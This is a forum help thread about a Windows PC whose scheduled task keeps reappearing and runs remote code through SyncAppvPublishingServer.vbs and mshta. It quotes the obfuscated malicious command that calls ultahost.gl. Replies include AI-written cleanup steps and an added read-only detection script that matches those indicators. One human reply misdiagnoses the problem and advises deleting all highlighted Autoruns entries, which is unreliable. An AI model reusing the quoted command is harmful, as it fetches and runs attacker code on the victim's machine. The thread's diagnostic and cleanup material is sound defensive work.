
C:\WINDOWS\System32\syncappvpublishingserver.vbs

miluan 0 Reputation points
2026-06-04T21:10:44.97+00:00

As the title says, my computer sometimes shows a pop-up from Windows Script Host with the title below:

User's image

(translates to "cannot find script file 'C:\WINDOWS\System32\syncappvpublishingserver.vbs' ")

I went through the task scheduler and found an operation called "UltahostService{GUID}" that would launch “wscript.exe %systemroot%\System32\SyncAppvPublishingServer.vbs ";*i**2\ms`h*e $('https:'+'//ulta'+'host.gl')", which will also create the dialog box above. I tried to delete or stop this operation, but neither works, and an identical operation is created again.

How can I fix this issue?

Edition Windows 11 family

Version 25H2

Installed on 2025/2/17 OS Build 26200.8457

Processor 12th Gen Intel(R) Core(TM) i5-1240P (1.70 GHz)

System type 64-bit operating system, x64-based processor

Windows for home | Windows 11 | Performance and system failures

2 answers

  1. Lester Bernard Reyes 80,780 Reputation points Independent Advisor
    2026-06-05T01:09:20.2833333+00:00

    Hi, I'm Bernard. I'm happy to help!

    The error is from Microsoft virtualization. To sort out the issue, I recommend running Autoruns, wherein we will remove unnecessary files that are not in use and are corrupted.

    1. Go to this link: https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
    2. Click "Download Autoruns and Autorunsc".
    3. Then open and run Autoruns.
    4. Delete all highlighted with Pink and Yellow color (if you cannot delete some of those, it is okay to skip).

    Note: This is a public forum. I may respond shortly, but I apologize in advance for any delays. I am simply a fellow user trying to provide helpful insights and information.


  2. AI answer

    2026-06-04T21:11:03.6366667+00:00

    The scheduled task and the script command that point to https://ultahost.gl indicate a malicious persistence mechanism that keeps recreating itself. Removing only the visible scheduled task is not enough; all persistence points that launch wscript.exe or PowerShell with that URL must be removed.

    Steps to clean it up:

    1. Remove malicious Run entries in the registry
      1. Open PowerShell as Administrator.
      2. List Run entries:
              reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
              reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
              reg query HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
        
      3. If any value launches wscript.exe, powershell.exe, or references SyncAppvPublishingServer.vbs or ultahost.gl, delete it, for example:
              reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<value name>" /f
        
    2. Find and delete malicious scheduled tasks
      1. Still in elevated PowerShell, list all tasks and their actions:
              Get-ScheduledTask | ForEach-Object {
                  foreach ($a in $_.Actions) {
                      "{0} | {1} {2}" -f ("$($_.TaskPath)$($_.TaskName)"), $a.Execute, $a.Arguments
                  }
              }
        
      2. Look for any task whose action runs wscript.exe or powershell.exe with SyncAppvPublishingServer.vbs, ultahost.gl, or similar obfuscated arguments.
      3. For each suspicious task (for example UltahostService{GUID}), remove it:
              Unregister-ScheduledTask -TaskName "UltahostService{GUID}" -Confirm:$false
        
        If it is under a custom path, include -TaskPath "\<path>\".
    3. Check for WMI-based persistence
      1. In elevated PowerShell, run:
              Get-WmiObject -Namespace root\subscription -Class __EventFilter
              Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
              Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
        
      2. If any entry launches wscript.exe, powershell.exe, or contains ultahost.gl, remove it (or have an experienced technician remove those specific WMI objects).
    4. Check Startup folders
      1. Open:
        • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
        • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
      2. Delete any unknown .vbs, .ps1, .bat, or shortcut that runs wscript.exe/powershell.exe with suspicious URLs.
    5. Verify no malicious PowerShell/WSH processes remain
      1. Run:
              Get-CimInstance Win32_Process | Where-Object {$_.Name -like "powershell*" -or $_.Name -like "wscript*"} | Select Name,ProcessId,ParentProcessId,CommandLine
        
      2. Only processes started manually should appear; if any still show ultahost.gl or similar, repeat the checks above.
    6. Run a full security scan
      • After cleaning persistence, run a full scan with Microsoft Defender (and optionally an offline scan) to remove any remaining payloads.

    Once all registry Run entries, scheduled tasks, WMI consumers, and startup items that reference SyncAppvPublishingServer.vbs or ultahost.gl are removed, the Windows Script Host popup will stop appearing.



    Was this answer helpful?
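
A read-only sweep of the Run keys, scheduled tasks and WMI consumers listed in the AI answer, as an added example that is not part of either answer or of any Microsoft tooling. It strips quotes, plus signs and backticks before matching, because the task in the question builds the URL from fragments ('//ulta'+'host.gl') and a plain substring search for ultahost.gl would miss it. Test-Indicator and New-Hit are hypothetical helper names; the indicator strings are the ones quoted in this thread.

```powershell
# Added example: lists matches only, deletes nothing. Run in an elevated
# Windows PowerShell session so machine-wide tasks and WMI objects are visible.
$indicators = 'SyncAppvPublishingServer\.vbs', 'ultahost\.gl', 'UltahostService'

function Test-Indicator([string]$Text) {   # hypothetical helper name
    # Strip quotes, plus signs, backticks, carets and whitespace so a URL
    # assembled from fragments is matched in its joined form.
    $flat = $Text -replace "['""``+^\s]", ''
    foreach ($i in $indicators) { if ($flat -match $i) { return $true } }
    return $false
}

function New-Hit($Source, $Location, $Detail) {   # hypothetical helper name
    [pscustomobject]@{ Source = $Source; Location = $Location; Detail = $Detail }
}

$hits = @(
    # Run keys: per-user, machine-wide and the 32-bit view
    foreach ($k in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                   'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                   'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run') {
        $key = Get-Item -Path $k -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $value = [string]$key.GetValue($name)
            if (Test-Indicator "$name $value") { New-Hit 'RunKey' "$k\$name" $value }
        }
    }
    # Scheduled tasks: match on the task name as well as the action
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if (Test-Indicator "$($t.TaskName) $cmd") {
                New-Hit 'ScheduledTask' "$($t.TaskPath)$($t.TaskName)" $cmd
            }
        }
    }
    # WMI event consumers in root\subscription
    foreach ($class in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer') {
        $consumers = Get-CimInstance -Namespace root\subscription -ClassName $class `
            -ErrorAction SilentlyContinue
        foreach ($c in $consumers) {
            $body = "$($c.CommandLineTemplate) $($c.ScriptText)"
            if (Test-Indicator $body) { New-Hit "WMI:$class" $c.Name $body }
        }
    }
)
$hits | Format-List
if (-not $hits) { 'No matches for the indicators from this thread.' }
```

Startup folders and running processes are not covered by this sweep and still need the manual checks from steps 4 and 5.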
